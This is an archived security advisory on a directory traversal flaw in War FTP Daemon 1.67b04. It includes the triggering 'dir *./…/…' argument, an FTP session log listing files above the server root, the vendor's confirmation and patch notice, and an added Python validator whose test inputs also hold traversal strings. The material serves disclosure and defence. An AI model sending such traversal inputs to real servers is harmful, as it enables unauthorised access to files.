securityvulns SECURITYVULNS:DOC:1372
Mar 11, 2001 - 12:00 a.m.

Warftp 1.67b04 Directory Traversal


Overview:
By adding a specially formed argument to the dir
command, it is possible to list the /…/ directory.

Detail:
The command is the following: dir *./…/…

Log:

Verbindung mit 10.17.3.44 wurde hergestellt.
220- Jgaa's Fan Club FTP Service WAR-FTPD 1.67-04 Ready
220 Please enter your user name.
Benutzer (10.17.3.44:(none)): anonymous
331 User name okay. Give your full Email address as password.
Kennwort:
230 User logged in, proceed.
ftp> dir
200 Port command okay.
150 Opening ASCII NO-PRINT mode data connection for ls -l.
total 123
drwxrwxrwx 1 ftp ftp 0 Mar 2 12:17 test
-rwxrwxrwx 1 ftp ftp 6 Mar 2 12:33 movedtohomedir.txt
-rwxrwxrwx 1 ftp ftp 11 Mar 2 00:29 bisontest.txt
drwxrwxrwx 1 ftp ftp 0 Mar 3 15:59 HTTP
drwxrwxrwx 1 ftp ftp 0 Mar 3 17:05 huhu
drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 te
drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 …te
226 Transfer finished successfully. Data connection closed.
FTP: 452 Bytes empfangen in 0,02Sekunden 22,60KB/s
ftp> cd …
550 Permission denied.
ftp> dir *./…/…
200 Port command okay.
150 Opening ASCII NO-PRINT mode data connection for ls *./…/…
total 123
-rwxrwxrwx 1 ftp ftp 251658240 Mar 4 18:42 WIN386.SWP
drwxrwxrwx 1 ftp ftp 0 Jan 6 20:32 games
drwxrwxrwx 1 ftp ftp 0 Jan 7 19:58 HalfLife
…(cut here)

drwxrwxrwx 1 ftp ftp 0 Jan 15 22:36 delphi_zips
drwxrwxrwx 1 ftp ftp 0 Mar 4 15:00 web
drwxrwxrwx 1 ftp ftp 0 Mar 4 21:36 WEBS
226 Transfer finished successfully. Data connection closed.
FTP: 2977 Bytes empfangen in 0,07Sekunden 42,53KB/s

The author has been contacted.
Response (slightly edited by se0020):

I can confirm that the problem is present in War FTP
Daemon 1.67.04.
After examining the problem, it looks like the exploit
is limited to listing the content one level up from the
root-directory. I was unable to access any of the
listed files or directories. I do however consider the
problem as serious, and will release a fix within a few
hours.

The patch has already been released:
http://support.jgaa.com
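
The log above shows cd being refused while a dir argument that combines a wildcard with dot segments is served. As an added example (not War FTP Daemon's code and not its actual fix), here is one way a server can confine a LIST/NLST argument to the FTP root before it reaches the file system. The function names, the rejection policy and the sample arguments are assumptions constructed for illustration.

```python
import re

WILDCARD = re.compile(r"[*?]")

class RejectedPath(ValueError):
    """Raised when a LIST argument must not reach the file system."""

def resolve_list_arg(cwd, arg):
    """Map a LIST/NLST argument to (virtual_dir, pattern) inside the FTP root.

    cwd is the session's virtual directory; "/" is the FTP root.
    """
    if "\x00" in arg:
        raise RejectedPath("NUL byte")
    arg = arg.replace("\\", "/")  # Windows accepts both separators
    stack = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    segments = [s for s in arg.split("/") if s not in ("", ".")]
    pattern = "*"
    for i, seg in enumerate(segments):
        last = i == len(segments) - 1
        if seg == "..":
            if not stack:
                raise RejectedPath("parent of FTP root")
            stack.pop()
        elif seg.rstrip(". ") == "":
            # "...", ".. " and similar: Win32 drops trailing dots and spaces,
            # so the file system would see a different name than was checked.
            raise RejectedPath("dot-only segment")
        elif WILDCARD.search(seg):
            if not last:
                raise RejectedPath("wildcard before final segment")
            pattern = seg
        elif seg != seg.rstrip(". "):
            raise RejectedPath("trailing dot or space")
        else:
            stack.append(seg)
    return "/" + "/".join(stack), pattern

def is_allowed(cwd, arg):
    try:
        resolve_list_arg(cwd, arg)
        return True
    except RejectedPath:
        return False

# Constructed sample arguments (not taken from a real session).
SAMPLES = [("/", "*.txt"), ("/test", "../huhu"), ("/", "*./../.."),
           ("/", "*./.../..."), ("/", ".../"), ("/test", "..\\..")]

if __name__ == "__main__":
    for cwd, arg in SAMPLES:
        print(f"{cwd!r:8} {arg!r:14} -> {'ok' if is_allowed(cwd, arg) else 'rejected'}")
```

The same resolver should sit in front of every command that takes a path (CWD, LIST, NLST, RETR and so on), so that no command bypasses a check another one enforces.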